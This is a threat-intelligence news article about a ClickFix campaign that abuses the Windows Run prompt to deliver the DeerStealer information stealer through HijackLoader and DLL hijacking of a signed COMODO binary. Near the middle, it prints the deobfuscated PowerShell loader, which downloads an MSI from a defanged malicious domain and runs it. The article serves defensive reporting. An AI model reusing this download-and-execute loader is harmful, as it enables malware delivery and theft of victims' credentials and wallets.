Threat Actors Abuse Windows Run Prompt to Execute Malicious Command and Deploy DeerStealer

Cybersecurity researchers have uncovered a sophisticated malware campaign that exploits Windows’ built-in Run prompt to deliver DeerStealer, a powerful information stealer designed to harvest cryptocurrency wallets, browser credentials, and sensitive personal data.

The malicious operation represents a concerning evolution in social engineering tactics, combining legitimate Windows functionality with advanced malware deployment techniques to bypass traditional security measures.

The attack campaign, which has been active throughout May 2025, employs a technique known as ClickFix to deceive victims into voluntarily executing malicious PowerShell commands through the Windows Run dialog box.

Victims are typically redirected to convincing phishing pages that present fake error messages or system notifications, prompting them to press Windows+R and paste a seemingly legitimate command to “resolve” the fabricated issue.

This approach effectively circumvents many security controls by leveraging the user’s own actions and trusted system processes.

eSentire security analysts identified multiple attempts by threat actors to deploy this malware through their Threat Response Unit (TRU), revealing the campaign’s widespread nature and sophisticated technical implementation.

The researchers discovered that the malware, also known as XFiles, is being sold on dark web hacking forums by a user identified as “LuciferXfiles” through a subscription-based model ranging from $200 to $3000 per month, depending on the feature set and services provided.

DeerStealer represents a comprehensive data theft platform capable of extracting over 800 browser extension credentials, targeting cryptocurrency wallets across 14 different digital currencies, and harvesting data from popular applications including Discord, Telegram, Steam, and various VPN clients.

The malware’s extensive capabilities extend beyond simple credential theft, incorporating advanced features such as clipboard hijacking for cryptocurrency address substitution, hidden VNC access for remote desktop control, and sophisticated obfuscation techniques that generate payloads with only 50% similarity between samples.

The malware’s infrastructure utilizes a proxy domain system called “Gasket” to obscure the true command and control server locations while maintaining persistent communication channels.

This approach, combined with the malware’s ability to fingerprint victim machines using hardware identifiers and system timestamps, demonstrates the threat actors’ commitment to operational security and long-term campaign sustainability.

Advanced Infection Mechanism and Payload Deployment

The DeerStealer infection chain begins with the execution of an obfuscated PowerShell command that victims paste into the Windows Run prompt.

The decoded command reveals a sophisticated multi-stage deployment process that leverages living-off-the-land binaries to avoid detection.

The initial PowerShell script contains the following deobfuscated content:-

$AqEVu = $env:AppData;
function kWERDs($EIpoJdP, $wQmPq){curl $EIpoJdP -o $wQmPq};
function zPWQQKzb($CAvStqT){kWERDs $CAvStqT $wQmPq}
$wQmPq = $env:AppData + 'now.msi';
zPWQQKzb "hxxps://luckyseaworld[.]com/now.msi";
msiexec.exe /i $wQmPq;;

This script utilizes the legitimate curl.exe utility to download a Microsoft Installer package named “now.msi” from a compromised or malicious domain, then executes it using the Windows Installer service.

The MSI file serves as a dropper for HijackLoader, a sophisticated malware loader that emerged in 2023 and employs steganography to hide its configuration data within encrypted PNG images.

Once deployed, HijackLoader copies several files to the C:ProgramData directory and executes a legitimate, digitally signed COMODO Internet Security binary that has been manipulated through DLL hijacking techniques.

The legitimate executable loads a malicious version of cmdres.dll, which contains hooks in the C runtime that redirect execution flow to the malware’s first stage, effectively using the trusted binary as a vehicle for malicious code execution while maintaining the appearance of legitimate system activity.

Automate threat response with ANY.RUN’s TI Feeds—Enrich alerts and block malicious IPs across all endpoints -> Request full access